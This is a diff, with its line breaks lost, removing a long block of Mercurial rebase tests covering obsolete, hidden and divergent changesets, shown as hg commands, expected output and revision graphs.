2327fea05063f39961b14cb69435a9898dc9a245 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 8eeb3c33ad33d452c89e5dcf611c347f978fb42b 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 
'user': 'test'} - - - $ cd .. - -empty changeset ---------------------------------- - - $ hg clone base empty - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd empty - $ hg up eea13746799a - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - -We make a copy of both the first changeset in the rebased and some other in the -set. - - $ hg graft 42ccdea3bb16 32af7686d403 - grafting 1:42ccdea3bb16 "B" - grafting 3:32af7686d403 "D" - $ hg rebase -s 42ccdea3bb16 -d . - rebasing 1:42ccdea3bb16 "B" - note: not rebasing 1:42ccdea3bb16 "B", its destination already has all its changes - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - note: not rebasing 3:32af7686d403 "D", its destination already has all its changes - $ hg log -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (pruned using rebase) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 10:5ae4c968c6ac) - | | - | x 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - - -More complex 
case where part of the rebase set were already rebased - - $ hg rebase --rev 'desc(D)' --dest 'desc(H)' - rebasing 9:08483444fef9 "D" - 1 new orphan changesets - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log -G - @ 11:4596109a6a43 D - | - | * 10:5ae4c968c6ac C - | | - | x 9:08483444fef9 D (rewritten using rebase as 11:4596109a6a43) - | | - | o 8:8877864f1edb B - | | - o | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg rebase --source 'desc(B)' --dest 'tip' --config experimental.rebaseskipobsolete=True - rebasing 8:8877864f1edb "B" - note: not rebasing 9:08483444fef9 "D", already in destination as 11:4596109a6a43 tip "D" - rebasing 10:5ae4c968c6ac "C" - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 
08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 8877864f1edb05d0e07dc4ba77b67a80a7b86672 462a34d07e599b87ea08676a449373fe4e2e1347 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5ae4c968c6aca831df823664e706c9d4aa34473d 98f6af4ee9539e14da4465128f894c274900b6e5 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log --rev 'contentdivergent()' - $ hg log -G - o 13:98f6af4ee953 C - | - o 12:462a34d07e59 B - | - @ 11:4596109a6a43 D - | - o 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --style default --debug -r 4596109a6a4328c398bde3a4a3b6737cfade3003 - changeset: 11:4596109a6a4328c398bde3a4a3b6737cfade3003 - phase: draft - parent: 7:02de42196ebee42ef284b6780a87cdc96e8eaab6 - parent: -1:0000000000000000000000000000000000000000 - manifest: 11:a91006e3a02f1edf631f7018e6e5684cf27dd905 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: rebase_source=08483444fef91d6224f6655ee586a65d263ad34c - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - - $ hg up -qr 'desc(G)' - $ hg graft 4596109a6a4328c398bde3a4a3b6737cfade3003 - grafting 11:4596109a6a43 "D" - $ hg up -qr 'desc(E)' - $ hg rebase -s tip -d . 
- rebasing 14:9e36056a46e3 tip "D" - $ hg log --style default --debug -r tip - changeset: 15:627d4614809036ba22b9e7cb31638ddc06ab99ab - tag: tip - phase: draft - parent: 4:9520eea781bcca16c1e15acc0ba14335a0e8e5ba - parent: -1:0000000000000000000000000000000000000000 - manifest: 15:648e8ede73ae3e497d093d3a4c8fcc2daa864f42 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: intermediate-source=4596109a6a4328c398bde3a4a3b6737cfade3003 - extra: rebase_source=9e36056a46e37c9776168c7375734eebc70e294f - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - -Start rebase from a commit that is obsolete but not hidden only because it's -a working copy parent. We should be moved back to the starting commit as usual -even though it is hidden (until we're moved there). - - $ hg --hidden up -qr 'first(hidden())' - updated to hidden changeset 42ccdea3bb16 - (hidden revision '42ccdea3bb16' is pruned) - $ hg rebase --rev 13 --dest 15 - rebasing 13:98f6af4ee953 "C" - $ hg log -G - o 16:294a2b93eb4d C - | - o 15:627d46148090 D - | - | o 12:462a34d07e59 B - | | - | o 11:4596109a6a43 D - | | - | o 7:02de42196ebe H - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | @ 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - - $ cd .. 
- -collapse rebase ---------------------------------- - - $ hg clone base collapse - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd collapse - $ hg rebase -s 42ccdea3bb16 -d eea13746799a --collapse - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 8:4dc2197e807b) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:4dc2197e807b) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:4dc2197e807b) - |/ - o 0:cd010b8cd998 A - - $ hg id --debug -r tip - 4dc2197e807bae9817f09905b50ab288be2dbbcf tip - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '1', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '2', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '3', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - - $ cd .. - -Rebase set has hidden descendants ---------------------------------- - -We rebase a changeset which has hidden descendants. Hidden changesets must not -be rebased. 
- - $ hg clone base hidden - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd hidden - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 5fddd98957c8 -d eea13746799a - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 9:cf44d2f5a9f4 D - | - o 8:e273c5e7d2d2 C - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 42ccdea3bb16 -d 02de42196ebe - rebasing 1:42ccdea3bb16 "B" - $ hg log -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 9:cf44d2f5a9f4) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:e273c5e7d2d2) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 10:7c6027df6a99) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b e273c5e7d2d29df783dce9f9eaa3ac4adc69c15d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a cf44d2f5a9f4297a62be94cbdd3dff7c7dc54258 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 7c6027df6a99d93f461868e5433f63bde20b6dfb 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 
'rebase', 'user': 'test'} - -Test that rewriting leaving instability behind is allowed ---------------------------------------------------------------------- - - $ hg log -r 'children(8)' - 9:cf44d2f5a9f4 D (no-eol) - $ hg rebase -r 8 - rebasing 8:e273c5e7d2d2 "C" - 1 new orphan changesets - $ hg log -G - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - | * 9:cf44d2f5a9f4 D - | | - | x 8:e273c5e7d2d2 C (rewritten using rebase as 11:0d8f238b634c) - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - $ cp -R hidden stabilize - $ cd stabilize - $ hg rebase --auto-orphans '0::' -d 10 - abort: cannot specify both --auto-orphans and --dest - [10] - $ hg rebase --auto-orphans '0::' - rebasing 9:cf44d2f5a9f4 "D" - $ hg log -G - o 12:7e3935feaa68 D - | - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - - $ cd ../hidden - $ rm -r ../stabilize - -Test multiple root handling ------------------------------------- - - $ hg rebase --dest 4 --rev '7+11+9' - rebasing 9:cf44d2f5a9f4 "D" - rebasing 7:02de42196ebe "H" - rebasing 11:0d8f238b634c tip "C" - $ hg log -G - o 14:1e8370e38cca C - | - @ 13:bfe264faf697 H - | - | o 12:102b4c1d889b D - |/ - | * 10:7c6027df6a99 B - | | - | x 7:02de42196ebe H (rewritten using rebase as 13:bfe264faf697) - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. 
- -Detach both parents - - $ hg init double-detach - $ cd double-detach - - $ hg debugdrawdag <<EOF - > F - > /| - > C E - > | | - > B D G - > \|/ - > A - > EOF - - $ hg rebase -d G -r 'B + D + F' - rebasing 1:112478962961 B "B" - rebasing 2:b18e25de2cf5 D "D" - rebasing 6:f15c3adaf214 F tip "F" - abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [10] - - $ cd .. - -test on rebase dropping a merge - -(setup) - - $ hg init dropmerge - $ cd dropmerge - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up 3 - 4 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 7 - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - (branch merge, don't forget to commit) - $ hg ci -m 'M' - $ echo I > I - $ hg add I - $ hg ci -m I - $ hg log -G - @ 9:4bde274eefcf I - | - o 8:53a6a128b2b7 M - |\ - | o 7:02de42196ebe H - | | - | | o 6:eea13746799a G - | |/| - | o | 5:24b6387c8c8c F - | | | - | | o 4:9520eea781bc E - | |/ - o | 3:32af7686d403 D - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - -(actual test) - - $ hg rebase --dest 6 --rev '((desc(H) + desc(D))::) - desc(M)' - rebasing 3:32af7686d403 "D" - rebasing 7:02de42196ebe "H" - rebasing 9:4bde274eefcf tip "I" - 1 new orphan changesets - $ hg log -G - @ 12:acd174b7ab39 I - | - o 11:6c11a6218c97 H - | - | o 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - -Test hidden 
changesets in the rebase set (issue4504) - - $ hg up --hidden 9 - 3 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 4bde274eefcf - (hidden revision '4bde274eefcf' was rewritten as: acd174b7ab39) - $ echo J > J - $ hg add J - $ hg commit -m J - 1 new orphan changesets - $ hg debugobsolete `hg log --rev . -T '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets - - $ hg rebase --rev .~1::. --dest 'max(desc(D))' --traceback --config experimental.rebaseskipobsolete=off - rebasing 9:4bde274eefcf "I" - rebasing 13:06edfc82198f tip "J" - 2 new content-divergent changesets - $ hg log -G - @ 15:5ae8a643467b J - | - * 14:9ad579b4a5de I - | - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg up 14 -C - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "K" > K - $ hg add K - $ hg commit --amend -m "K" - 1 new orphan changesets - $ echo "L" > L - $ hg add L - $ hg commit -m "L" - $ hg up '.^' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "M" > M - $ hg add M - $ hg commit --amend -m "M" - 1 new orphan changesets - $ hg log -G - @ 18:bfaedf8eb73b M - | - | * 17:97219452e4bd L - | | - | x 16:fc37a630c901 K (rewritten using amend as 18:bfaedf8eb73b) - |/ - | * 15:5ae8a643467b J - | | - | x 14:9ad579b4a5de I (rewritten using amend as 16:fc37a630c901) - |/ - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a 
G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 14 -d 17 --config experimental.rebaseskipobsolete=True - note: not rebasing 14:9ad579b4a5de "I", already in destination as 16:fc37a630c901 "K" - rebasing 15:5ae8a643467b "J" - 1 new orphan changesets - - $ cd .. - -Skip obsolete changeset even with multiple hops ------------------------------------------------ - -setup - - $ hg init obsskip - $ cd obsskip - $ cat << EOF >> .hg/hgrc - > [experimental] - > rebaseskipobsolete = True - > [extensions] - > strip = - > EOF - $ echo A > A - $ hg add A - $ hg commit -m A - $ echo B > B - $ hg add B - $ hg commit -m B0 - $ hg commit --amend -m B1 - $ hg commit --amend -m B2 - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo C > C - $ hg add C - $ hg commit -m C - 1 new orphan changesets - $ hg log -G - @ 4:212cb178bcbb C - | - | o 3:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290) - |/ - o 0:4a2df7238c3b A - - -Rebase finds its way in a chain of marker - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2" - rebasing 4:212cb178bcbb tip "C" - -Even when the chain include missing node - - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo D > D - $ hg add D - $ hg commit -m D - 1 new orphan changesets - $ hg --hidden strip -r 'desc(B1)' - saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg - 1 new orphan changesets - $ hg 
log -G - @ 5:1a79b7535141 D - | - | o 4:ff2c4d47b71d C - | | - | o 2:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290) - |/ - o 0:4a2df7238c3b A - - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2" - rebasing 5:1a79b7535141 tip "D" - $ hg up 4 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "O" > O - $ hg add O - $ hg commit -m O - $ echo "P" > P - $ hg add P - $ hg commit -m P - $ hg log -G - @ 8:8d47583e023f P - | - o 7:360bbaa7d3ce O - | - | o 6:9c48361117de D - | | - o | 4:ff2c4d47b71d C - |/ - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - $ hg rebase -d 6 -r "4::" - rebasing 4:ff2c4d47b71d "C" - note: not rebasing 7:360bbaa7d3ce "O", it has no successor - rebasing 8:8d47583e023f tip "P" - -If all the changeset to be rebased are obsolete and present in the destination, we -should display a friendly error message - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "non-relevant change" > nonrelevant - $ hg add nonrelevant - $ hg commit -m nonrelevant - created new head - $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G - @ 11:f44da1f4954c nonrelevant (pruned) - | - | o 10:121d9e3bc4c6 P - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg rebase -r . 
-d 10 - note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor - -If a rebase is going to create divergence, it should abort - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "john" > doe - $ hg add doe - $ hg commit -m "john doe" - created new head - $ hg up 10 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "foo" > bar - $ hg add bar - $ hg commit --amend -m "10'" - $ hg up 10 --hidden - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 121d9e3bc4c6 - (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2) - $ echo "bar" > foo - $ hg add foo - $ hg commit -m "bar foo" - 1 new orphan changesets - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg summary - parent: 14:73568ab6879d tip (orphan) - bar foo - branch: default - commit: (clean) - update: 2 new changesets, 3 branch heads (merge) - phases: 8 draft - orphan: 1 changesets - $ hg rebase -s 10 -d 12 - abort: this rebase will cause divergences from: 121d9e3bc4c6 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - -With experimental.evolution.allowdivergence=True, rebase can create divergence - - $ hg rebase -s 10 -d 12 --config 
experimental.evolution.allowdivergence=True - rebasing 10:121d9e3bc4c6 "P" - rebasing 14:73568ab6879d tip "bar foo" - 2 new content-divergent changesets - $ hg summary - parent: 16:61bd55f69bc4 tip - bar foo - branch: default - commit: (clean) - update: 1 new changesets, 2 branch heads (merge) - phases: 8 draft - content-divergent: 2 changesets - -rebase --continue + skipped rev because their successors are in destination -we make a change in trunk and work on conflicting changes to make rebase abort. - - $ hg log -G -r 16:: - @ 16:61bd55f69bc4 bar foo - | - ~ - -Create the two changes in trunk - $ printf "a" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict first version" - - $ printf "dummy" > C - $ hg commit -m "dummy change successor" - -Create the changes that we will rebase - $ hg update -C 16 -q - $ printf "b" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict second version" - created new head - $ printf "dummy" > K - $ hg add K - $ hg commit -m "dummy change" - $ printf "dummy" > L - $ hg add L - $ hg commit -m "dummy change" - $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - - $ hg log -G -r 16:: - @ 21:7bdc8a87673d dummy change - | - x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51) - | - o 19:b82fb57ea638 willconflict second version - | - | o 18:601db7a18f51 dummy change successor - | | - | o 17:357ddf1602d5 willconflict first version - |/ - o 16:61bd55f69bc4 bar foo - | - ~ - $ hg rebase -r ".^^ + .^ + ." -d 18 - rebasing 19:b82fb57ea638 "willconflict second version" - merging willconflict - warning: conflicts while merging willconflict! 
(edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ hg resolve --mark willconflict - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 19:b82fb57ea638 "willconflict second version" - note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" - rebasing 21:7bdc8a87673d tip "dummy change" - $ cd .. - Divergence cases due to obsolete changesets ------------------------------------------- @@ -1650,489 +624,3 @@ Z $ cd .. - -Test that bookmark is moved and working dir is updated when all changesets have -equivalents in destination - $ hg init rbsrepo && cd rbsrepo - $ echo "[experimental]" > .hg/hgrc - $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc - $ echo root > root && hg ci -Am root - adding root - $ echo a > a && hg ci -Am a - adding a - $ hg up 0 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo b > b && hg ci -Am b - adding b - created new head - $ hg rebase -r 2 -d 1 - rebasing 2:1e9a3c00cbe9 tip "b" - $ hg log -r . # working dir is at rev 3 (successor of 2) - 3:be1832deae9a b (no-eol) - $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now - bookmarking hidden changeset 1e9a3c00cbe9 - (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a) - $ hg up 2 && hg log -r . # working dir is at rev 2 again - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol) - $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1 - note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b" -Check that working directory and bookmark was updated to rev 3 although rev 2 -was skipped - $ hg log -r . 
- 3:be1832deae9a b (no-eol) - $ hg bookmarks - mybook 3:be1832deae9a - $ hg debugobsolete --rev tip - 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Obsoleted working parent and bookmark could be moved if an ancestor of working -parent gets moved: - - $ hg init $TESTTMP/ancestor-wd-move - $ cd $TESTTMP/ancestor-wd-move - $ hg debugdrawdag <<'EOS' - > E D1 # rebase: D1 -> D2 - > | | - > | C - > D2 | - > | B - > |/ - > A - > EOS - $ hg update D1 -q - $ hg bookmark book -i - $ hg rebase -r B+D1 -d E - rebasing 1:112478962961 B "B" - note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2" - 1 new orphan changesets - $ hg log -G -T '{desc} {bookmarks}' - @ B book - | - | x D1 - | | - o | E - | | - | * C - | | - o | D2 - | | - | x B - |/ - o A - -Rebasing a merge with one of its parent having a hidden successor - - $ hg init $TESTTMP/merge-p1-hidden-successor - $ cd $TESTTMP/merge-p1-hidden-successor - - $ hg debugdrawdag <<'EOS' - > E - > | - > B3 B2 # amend: B1 -> B2 -> B3 - > |/ # B2 is hidden - > | D - > | |\ - > | B1 C - > |/ - > 